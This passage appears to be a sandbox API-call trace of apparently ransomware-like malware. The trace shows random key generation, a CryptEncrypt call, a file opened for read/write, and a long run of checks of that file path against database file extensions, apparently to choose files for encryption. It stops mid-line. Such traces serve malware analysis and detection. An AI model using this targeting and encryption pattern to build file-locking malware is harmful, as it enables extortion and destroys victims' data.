[0158.239] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0158.239] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0158.239] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0158.240] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0158.240] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec [0158.240] GetLastError () returned 0x0 [0158.240] GetFileSizeEx (in: hFile=0x6ec, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=2362) returned 1 [0158.240] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dd") returned 0x0 [0158.240] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dl") returned 0x0 [0158.240] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdb") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdc") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accde") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdr") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdt") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accft") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adb") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ade") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adf") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adp") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".arc") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ora") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".alf") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ask") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".btr") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bdf") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cat") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cdb") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ckp") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cma") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cpd") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dacpac") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dad") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dadiagrams") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".daschema") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db") returned 0x0 [0158.241] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-shm") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-wal") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db3") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbc") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbf") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbs") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbt") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbv") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbx") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcb") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dct") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcx") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ddl") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dlis") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dp1") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dqy") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsk") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsn") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dtsx") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dxl") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".eco") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ecx") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".edb") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".epim") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".exb") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fcd") returned 0x0 [0158.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fdb") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fic") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp12") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmpsl") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fol") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp3") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp4") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp5") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp7") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fpt") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".frm") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gdb") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".grdb") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gwi") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hdb") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".his") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ib") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".idb") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ihx") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itdb") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itw") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jet") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jtx") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexi") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexic") returned 0x0 [0158.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexis") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lgc") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lwx") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maf") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maq") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mar") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mas") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mav") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdb") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdf") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mpd") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mrg") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mud") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mwb") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".myd") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ndf") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nnt") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nrmlib") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns2") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns3") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns4") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nsf") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv2") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nwdb") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nyf") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".odb") returned 0x0 [0158.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".oqy") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".orx") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".owc") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p96") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p97") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pan") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdb") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdm") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pnz") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qry") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qvd") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rbf") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rctd") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rod") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rodx") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rpd") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rsd") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sas7bdat") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sbf") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".scx") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdb") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdc") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdf") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sis") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".spq") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sql") returned 0x0 [0158.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite3") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlitedb") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".te") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".temx") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tmd") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tps") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trc") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trm") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udb") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udl") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".usr") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".v12") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vis") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vpd") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vvv") returned 0x0 [0158.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wdb") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wmdb") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wrk") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xdb") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xld") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xmlff") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abcddb") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abs") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abx") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdw") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adn") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db2") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fm5") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hjt") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All 